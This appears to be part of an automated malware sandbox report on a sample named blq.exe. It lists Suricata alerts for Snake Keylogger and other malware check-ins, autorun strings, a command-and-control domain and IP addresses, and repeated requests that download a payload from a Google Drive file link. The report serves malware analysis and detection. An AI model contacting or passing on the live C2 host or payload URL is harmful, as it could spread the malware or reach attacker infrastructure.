                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49926 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49943 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49962 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49963 version: TLS 1.2
                          Source: Binary string: rundll32.pdb source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                          Source: blq.exe, 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                          Source: blq.exeBinary or memory string: [autorun]
                          Source: blq.exeBinary or memory string: [autorun]
                          Source: blq.exeBinary or memory string: autorun.inf
                          Source: RCXAFD2.tmp.0.drBinary or memory string: [autorun]
                          Source: RCXAFD2.tmp.0.drBinary or memory string: [autorun]
                          Source: RCXAFD2.tmp.0.drBinary or memory string: autorun.inf
                          Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                          Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                          Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                          Source: ~$cache1.3.drBinary or memory string: [autorun]
                          Source: ~$cache1.3.drBinary or memory string: [autorun]
                          Source: ~$cache1.3.drBinary or memory string: autorun.inf
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile opened: C:\Users\user\AppDataJump to behavior

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49740 -> 69.42.215.252:80
                          Source: Network trafficSuricata IDS: 2814897 - Severity 1 - ETPRO MALWARE W32.YoungLotus Checkin : 192.168.2.4:49733 -> 103.36.221.195:8790
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49735 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49734 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49745 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49744 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49759 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49758 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49787 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49808 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49765 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49796 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49812 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49815 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49822 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49838 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49852 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49797 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49780 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49862 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49861 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49872 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49888 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49807 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49889 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49827 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49764 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49823 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49841 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49843 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49784 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49829 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49876 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49879 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49853 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49839 -> 142.250.181.14:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49873 -> 142.250.181.14:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: xred.mooo.com
                          Uses dynamic DNS services
                          Source: unknownDNS query: name: freedns.afraid.org
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: global trafficTCP traffic: 192.168.2.4:49733 -> 103.36.221.195:8790
                          Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                          Source: Joe Sandbox ViewASN Name: CHINA169-BJChinaUnicomBeijingProvinceNetworkCN CHINA169-BJChinaUnicomBeijingProvinceNetworkCN
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownTCP traffic detected without corresponding DNS query: 103.36.221.195
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_1000152B select,memset,recv,4_2_1000152B
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
